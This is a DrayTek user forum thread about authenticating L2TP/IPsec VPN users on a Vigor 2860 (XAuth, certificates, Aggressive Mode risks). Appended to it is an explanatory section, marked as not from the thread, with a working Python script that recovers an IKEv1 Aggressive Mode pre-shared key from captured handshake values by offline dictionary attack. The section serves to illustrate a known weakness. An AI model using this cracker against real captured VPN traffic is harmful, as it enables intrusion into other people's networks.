DrayTek UK Users' Community Forum

Help, Advice and Solutions from DrayTek Users

L2TP w/IPSec VPN - Specify Remote Node - Peer ID - Where?

21 Dec 2018 17:18 #7 by hornbyp
//cont'd//


  1. XAuth authentication support recently appeared on the Vigor 2860. I'm puzzled as to how this has been implemented - and I've not really got it to work.

    This: https://www.juniper.net/documentation/en_US/nsm2012.2/topics/concept/security-service-firewall-xauth-user-authentication-overview.html
    implies that although it can authenticate a "user", it can also authenticate a "device". DrayTek's implementation (on the 2860) seems to take the form of another global PSK, so maybe it's the latter :? On the 2860, at least, it doesn't seem to help in authenticating individuals.

    An XAuth user (or user group) is a RAS user who authenticates when connecting to the security device using an AutoKey IKE VPN tunnel. Although both IKE and XAuth users can authenticate through an AutoKey IKE VPN tunnel, the authentication of IKE users is actually the authentication of VPN gateways or clients, while the authentication of XAuth users is the authentication of the individuals themselves. XAuth users must enter information that only they are supposed to know—their username and password.



  2. Finally, X.509 certificates do work as a means of authenticating users (at the IPsec level). Getting that certificate infrastructure in place can be quite entertaining :wink:


22 Dec 2018 12:54 #8 by routintooter
Thanks for that Hornbyp!

My friend said that trying to get X.509 working resulted in him losing a few hairs.

If I have any more updates from tinkering, I'll add them here.

Thanks again.


27 Dec 2018 01:37 #9 by hornbyp

I wrote: The Android client (8.0 and maybe others) can be made to use Aggressive Mode, along with its per-user PSK. Unfortunately, the Vigor 2860 cannot be made to respond to it properly. :(

A variety of 3rd party VPN clients exist (though all seem to be commercial offerings). Some of these offer Aggressive Mode. I might investigate if any of them can successfully connect to the Vigor 2860, as a means of shedding light on the failure point in (4.) above.


I tried a VPN client from Zyxel (Zywall?) ... which seems to be a rebranded version of the Greenbow client (and is a similar sort of price :( ). That connected quickly and easily to the 2860, using Aggressive mode and a per-user key. So, whatever the issue is with Android, it does seem to be at the Android end.

However, having done some more research into Aggressive Mode, it seems it needs to be used with caution. If you're connecting directly to an ISP at each end of the link, the chance of the plain text PSK hash being intercepted is pretty low (unless the ISP is under the influence of a government agency!).
However, if you're connecting via some dodgy WiFi network (that you don't trust and hence the use of the VPN), it definitely could happen. Once the PSK hash has been acquired, an attacker can spend as long as they want, mounting offline attacks against it. So its use in (say) a Chinese hotel might not be advisable :o ...

See: https://www.pivotpointsecurity.com/blog/vpn-security-risks-main-aggressive-mode/

I also wrote: XAuth authentication support recently appeared on the Vigor 2860. I'm puzzled as to how this has been implemented - and I've not really got it to work.


Revisiting this, I remembered that I did get it working on Android; the problem on Windows being that it's only supported by the 3rd party (£) VPN clients. The downside to XAuth is that it also uses a global PSK and needs a local (not RADIUS) dial-in user. The global PSK is effectively authenticating the device - but, if compromised, doesn't seem to be of any use by itself (unlike the global "IPsec" General key).

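The offline attack on an Aggressive Mode PSK that hornbyp warns about in post #9, worked through as an added example (this is not code from the forum thread, from DrayTek, or from any VPN client). In IKEv1 Aggressive Mode the initiator's identity (the "peer ID" this thread is about) travels in message 1 in the clear, which is what lets a gateway pick a per-user key, and the responder's HASH_R in message 2 is sent unencrypted because no keying material exists yet. A passive observer on the hotel Wi-Fi therefore has every input to HASH_R except the PSK and can test candidates offline. The derivation is the one in RFC 2409 section 5.4; every value in CAPTURE is constructed for illustration and the gateway key, wordlist and helper names are assumptions.

```python
"""
IKEv1 Aggressive Mode pre-shared-key recovery (RFC 2409 section 5.4).

Added example, not code from the forum post or from DrayTek. Every value in
CAPTURE below is constructed for illustration, not taken from a real Vigor 2860
exchange; only the key derivation is the real one from the RFC.
"""
import hashlib
import hmac
from typing import Iterable, Optional

# RFC 2407 section 4.6.2.1 identification types used with IKEv1.
ID_IPV4_ADDR = 1
ID_FQDN = 2
ID_USER_FQDN = 3


def prf(key: bytes, data: bytes) -> bytes:
    """IKEv1 prf when SHA-1 is the negotiated hash: HMAC-SHA1 (RFC 2409 section 3.2)."""
    return hmac.new(key, data, hashlib.sha1).digest()


def id_payload_body(id_type: int, data: bytes, proto: int = 17, port: int = 500) -> bytes:
    """Body of an ISAKMP Identification payload: type, protocol, port, then the identity."""
    return bytes([id_type, proto]) + port.to_bytes(2, "big") + data


def compute_hash_r(psk: bytes, c: dict) -> bytes:
    """HASH_R as the responder sends it in Aggressive Mode message 2, unencrypted.

    SKEYID = prf(PSK, Ni_b | Nr_b)
    HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)
    Everything except the PSK is visible to anyone who captured messages 1 and 2.
    """
    skeyid = prf(psk, c["ni_b"] + c["nr_b"])
    return prf(skeyid, c["gxr"] + c["gxi"] + c["cky_r"] + c["cky_i"] + c["sai_b"] + c["idir_b"])


def recover_psk(c: dict, observed_hash_r: bytes, candidates: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: no further packets to the gateway are needed."""
    for cand in candidates:
        if hmac.compare_digest(compute_hash_r(cand.encode(), c), observed_hash_r):
            return cand
    return None


# Constructed stand-in for a sniffed Aggressive Mode exchange (hypothetical values).
CAPTURE = {
    "cky_i": bytes.fromhex("a1b2c3d4e5f60718"),            # initiator cookie (msg 1 header)
    "cky_r": bytes.fromhex("1122334455667788"),            # responder cookie (msg 2 header)
    "ni_b": bytes(range(16)),                              # Ni payload body (msg 1)
    "nr_b": bytes(range(16, 32)),                          # Nr payload body (msg 2)
    "gxi": hashlib.sha256(b"initiator-ke").digest() * 4,   # KE payload body stand-in (msg 1)
    "gxr": hashlib.sha256(b"responder-ke").digest() * 4,   # KE payload body stand-in (msg 2)
    # SA payload body stand-in: DOI=IPsec, SIT=identity-only, then a proposal blob (msg 1).
    "sai_b": bytes.fromhex("00000001" "00000001") + bytes(range(40)),
    # IDir body: the gateway identifies itself by IPv4 address (msg 2).
    "idir_b": id_payload_body(ID_IPV4_ADDR, bytes([203, 0, 113, 1])),
}

# Message 1 also carries IDii in the clear, e.g.
# id_payload_body(ID_USER_FQDN, b"alice@example.com"); that peer ID is what lets
# the gateway select a per-user PSK before any key material exists.


def demo() -> Optional[str]:
    gateway_psk = b"vigor2860"                       # the gateway's real key, unknown to the attacker
    observed = compute_hash_r(gateway_psk, CAPTURE)  # what the sniffer saw in message 2
    wordlist = ["password", "draytek", "letmein", "vigor2860", "hunter2"]  # constructed
    return recover_psk(CAPTURE, observed, wordlist)


if __name__ == "__main__":
    print("recovered PSK:", demo())
```

Main Mode does not have this exposure: there HASH_R is only sent after the Diffie-Hellman exchange, encrypted under SKEYID_e, but the responder must then choose the PSK from the initiator's IP address alone, which is why per-user keys for roaming clients push people towards Aggressive Mode. The cost of a weak PSK here is the whole dictionary attack running at HMAC speed with no rate limiting, so either the PSK is long and random or the site uses certificates or XAuth on top, as the post goes on to discuss.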
